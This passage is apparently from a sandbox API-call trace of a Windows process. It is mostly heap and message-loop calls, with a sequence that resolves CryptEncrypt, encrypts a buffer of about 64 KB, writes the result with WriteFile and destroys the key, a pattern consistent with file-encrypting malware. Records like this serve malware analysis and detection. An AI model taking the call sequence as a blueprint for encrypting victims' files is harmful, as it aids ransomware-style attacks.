hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.888] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a58 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.888] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b30 | out: hHeap=0x2af0000) returned 1 [0101.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.888] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0101.888] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0101.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0101.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0101.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0101.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0101.889] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0101.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e00 [0101.889] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0101.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.889] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.890] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0101.890] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e00 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37cfbc0 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0101.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0101.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0101.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9f10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.893] CryptEncrypt (in: hKey=0x9a46c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xfb70, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xfb78) returned 1 [0101.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.906] CharLowerBuffW (in: lpsz="byte[64376]", cchLength=0xb | out: lpsz="byte[64376]") returned 0xb [0101.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.907] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.907] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.907] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.907] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.907] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ef8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.908] CryptEncrypt (in: hKey=0x9a46c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37cfbc0*, pdwDataLen=0x8cef60*=0xfb70, dwBufLen=0xfb78 | out: pbData=0x37cfbc0*, pdwDataLen=0x8cef60*=0xfb78) returned 1 [0101.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.914] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.914] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.914] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.914] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.914] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.914] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.914] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.914] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.914] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.914] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.915] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.957] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.962] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.962] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.962] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.963] WriteFile (in: hFile=0x458, lpBuffer=0x2a89cb0*, nNumberOfBytesToWrite=0xfb78, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a89cb0*, lpNumberOfBytesWritten=0x8cf5e4*=0xfb78, lpOverlapped=0x0) returned 1 [0101.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.966] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0101.966] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.966] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0101.966] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.966] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.966] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.966] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0101.966] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.966] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0101.966] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0101.966] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9ad8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0101.967] CryptDestroyKey (hKey=0x9a46c0) returned 1 [0101.967] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.967] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.967] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.967] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.967] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 